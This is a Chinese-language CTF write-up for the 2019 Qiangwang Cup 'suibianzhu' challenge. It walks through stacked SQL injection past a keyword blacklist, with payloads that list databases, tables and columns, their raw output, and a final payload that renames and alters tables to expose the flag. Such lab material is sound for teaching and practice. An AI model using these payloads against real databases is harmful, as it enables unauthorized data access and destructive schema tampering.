[强网杯 2019]随便注
知识点
- 堆叠注入
尝试了一下单引号闭合;存在堆叠注入;过滤了
return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
右键看源码有一个注释
<!-- sqlmap是没有灵魂的 -->
于是试了下sqlmap,可以跑出数据库跑不出表;
动手:payload:`1’;show database;show tables;
array(2) {
[0]=>
string(1) "1"
[1]=>
string(7) "hahahah"
}
_________________________________________________________________________________________
array(1) {
[0]=>
string(11) "ctftraining"
}
array(1) {
[0]=>
string(18) "information_schema"
}
array(1) {
[0]=>
string(5) "mysql"
}
array(1) {
[0]=>
string(18) "performance_schema"
}
array(1) {
[0]=>
string(9) "supersqli"
}
array(1) {
[0]=>
string(4) "test"
}
_________________________________________________________________________________________
array(1) {
[0]=>
string(16) "1919810931114514"
}
array(1) {
[0]=>
string(5) "words"
}
可以看见数据库;和当前数据库的表都出来了.
再用 1’; show columns from words ;和 1’; show columns from 1919810931114514;看一下表里面的字段
//woeds
array(6) {
[0]=>
string(2) "id"
[1]=>
string(7) "int(10)"
[2]=>
string(2) "NO"
[3]=>
string(0) ""
[4]=>
NULL
[5]=>
string(0) ""
}
array(6) {
[0]=>
string(4) "data"
[1]=>
string(11) "varchar(20)"
[2]=>
string(2) "NO"
[3]=>
string(0) ""
[4]=>
NULL
[5]=>
string(0) ""
}
0';show columns from `1919810931114514`;
实际测试的时候发现纯数字的表要加上``符号
//1919810931114514
array(6) {
[0]=>
string(4) "flag"
[1]=>
string(12) "varchar(100)"
[2]=>
string(2) "NO"
[3]=>
string(0) ""
[4]=>
NULL
[5]=>
string(0) ""
}
看一下大概知道我们现在语句查询的表是woeds
,flag一个在1919810931114514
这个表里面.
猜测一下查询语句大概是:select * form words where id = $_GET("inject")';
接下来就是要想法办法去查零位一张表里面的东西
1.将words表改名为word1或其它任意名字
2.1919810931114514改名为word
3.将新的word表插入一列,列名为id
4.将flag列改名为data
我们的payload
1';rename table words to word1;rename table `1919810931114514` to words;alter table words add id int unsigned not Null auto_increment primary key; alert table words change flag data varchar(100);#
直接再查个1就可以得到flag